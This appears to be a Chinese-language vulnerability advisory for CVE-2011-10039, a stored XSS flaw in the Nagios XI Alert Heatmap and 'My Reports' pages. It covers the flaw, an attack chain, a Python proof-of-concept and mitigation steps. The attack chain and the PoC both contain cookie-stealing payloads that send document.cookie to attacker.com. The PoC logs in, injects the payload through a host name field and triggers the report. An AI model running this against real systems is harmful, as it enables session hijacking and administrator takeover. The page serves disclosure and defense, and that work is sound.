CVE-2011-10039 Nagios XI Alert Heatmap XSS跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2011-10039

漏洞类型

XSS（跨站脚本漏洞）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Nagios XI

漏洞概述

CVE-2011-10039是Nagios XI软件中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于Nagios XI的Alert Heatmap报告功能和"My Reports"列表页面中。漏洞根源在于应用程序对用户输入的警报数据缺乏充分的验证和转义处理，导致攻击者可以在报告内容中注入恶意JavaScript代码。当其他用户访问这些包含恶意脚本的报告页面时，攻击代码会在受害者浏览器中执行，从而窃取会话Cookie、劫持用户账户或执行其他恶意操作。由于该漏洞需要认证后的低权限用户才能触发，且需要受害者交互才能完成攻击，因此CVSS评分仅为5.4（中危）。然而，在实际攻击场景中，攻击者可结合社会工程学手段诱导管理员访问恶意报告，从而获取管理员权限，对系统安全造成严重威胁。

技术细节

Nagios XI的Alert Heatmap报告功能用于可视化显示监控主机的告警状态，该功能在生成报告时直接使用数据库中存储的告警信息而未进行适当的输入验证和输出编码。攻击者可以通过以下方式利用此漏洞：首先，攻击者需要拥有Nagios XI的低权限账户；然后，攻击者在主机的告警名称或描述字段中注入恶意JavaScript代码（如<script>alert(document.cookie)</script>）；接着，当Nagios XI生成Alert Heatmap报告或用户访问"My Reports"页面时，这些恶意代码会被嵌入到生成的HTML页面中；最后，当其他用户（尤其是管理员）访问该报告页面时，恶意脚本会在其浏览器上下文中执行，从而实现会话劫持、敏感信息窃取等攻击目的。漏洞的根本原因在于：1）输入验证不足，未过滤危险字符；2）输出编码缺失，未对特殊字符进行HTML实体转义；3）未实施内容安全策略（CSP）来限制脚本执行。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标系统运行Nagios XI，并确定版本低于2011R1.9

STEP 2

2. 账户获取

攻击者通过暴力破解、默认凭据或社会工程学获取Nagios XI的低权限用户账户

STEP 3

3. 恶意代码注入

攻击者在受影响主机的告警名称、描述或标签字段中注入XSS恶意载荷，如<script>document.location='https://attacker.com/steal?c='+document.cookie</script>

STEP 4

4. 报告生成触发

攻击者访问Alert Heatmap报告功能或"My Reports"页面，触发包含恶意脚本的报告生成

STEP 5

5. 受害者访问

目标用户（特别是管理员）访问包含恶意代码的报告页面，触发XSS执行

STEP 6

6. 会话劫持

恶意脚本窃取用户会话Cookie并发送到攻击者控制的服务器

STEP 7

7. 权限提升

攻击者利用窃取的会话Cookie冒充管理员身份，执行未授权操作或获取系统完全控制权

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from bs4 import BeautifulSoup

# CVE-2011-10039 PoC - Nagios XI XSS via Alert Heatmap Report
# Target: Nagios XI < 2011R1.9

TARGET_URL = "http://target-nagios-xi.local"
USERNAME = "attacker"
PASSWORD = "password123"

def login():
    """Authenticate to Nagios XI and obtain session cookie"""
    session = requests.Session()
    login_url = f"{TARGET_URL}/nagiosxi/login.php"
    
    login_data = {
        "username": USERNAME,
        "password": PASSWORD,
        "loginButton": "Login"
    }
    
    response = session.post(login_url, data=login_data, timeout=10)
    
    if "nagiosxi" in response.cookies.keys() or response.status_code == 200:
        return session
    return None

def inject_xss_payload(session):
    """Inject XSS payload into host alert name/description"""
    # XSS payload for stealing cookies
    xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
    
    # Inject via host configuration
    host_config_url = f"{TARGET_URL}/nagiosxi/config/hosts"
    
    host_data = {
        "host_name": f"TestHost{xss_payload}",
        "address": "192.168.1.100",
        "max_check_attempts": "5",
        "check_period": "24x7",
        "contacts": "nagiosadmin",
        "submit": "Commit Changes"
    }
    
    response = session.post(host_config_url, data=host_data)
    return response.status_code == 200

def trigger_heatmap(session):
    """Trigger Alert Heatmap report generation"""
    # Generate Alert Heatmap report
    report_url = f"{TARGET_URL}/nagiosxi/reports/alertheatmap.php"
    
    response = session.get(report_url)
    
    # Check if XSS payload is reflected
    if '<script>' in response.text:
        print("[+] XSS vulnerability confirmed!")
        print("[+] Payload executed in Alert Heatmap report")
        return True
    return False

def main():
    print(f"[*] CVE-2011-10039 PoC - Nagios XI XSS")
    print(f"[*] Target: {TARGET_URL}")
    
    # Step 1: Login
    print("\n[1] Attempting authentication...")
    session = login()
    if not session:
        print("[-] Authentication failed")
        sys.exit(1)
    print("[+] Authentication successful")
    
    # Step 2: Inject XSS payload
    print("\n[2] Injecting XSS payload into host alert...")
    if inject_xss_payload(session):
        print("[+] Payload injected successfully")
    
    # Step 3: Trigger vulnerability
    print("\n[3] Triggering Alert Heatmap report...")
    if trigger_heatmap(session):
        print("[+] Vulnerability confirmed!")
    else:
        print("[-] Vulnerability not detected")

if __name__ == "__main__":
    main()

影响范围

Nagios XI < 2011R1.9

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1）对所有告警输入字段实施严格的输入验证，过滤<、>、script等危险字符；2）在Web服务器层面配置XSS防护策略，如Apache的ModSecurity规则；3）限制低权限用户创建和修改告警报告的权限；4）启用浏览器的XSS过滤器作为额外防护层；5）监控和审计报告页面的访问日志，及时发现异常访问模式；6）考虑临时禁用Alert Heatmap报告功能以减少攻击面。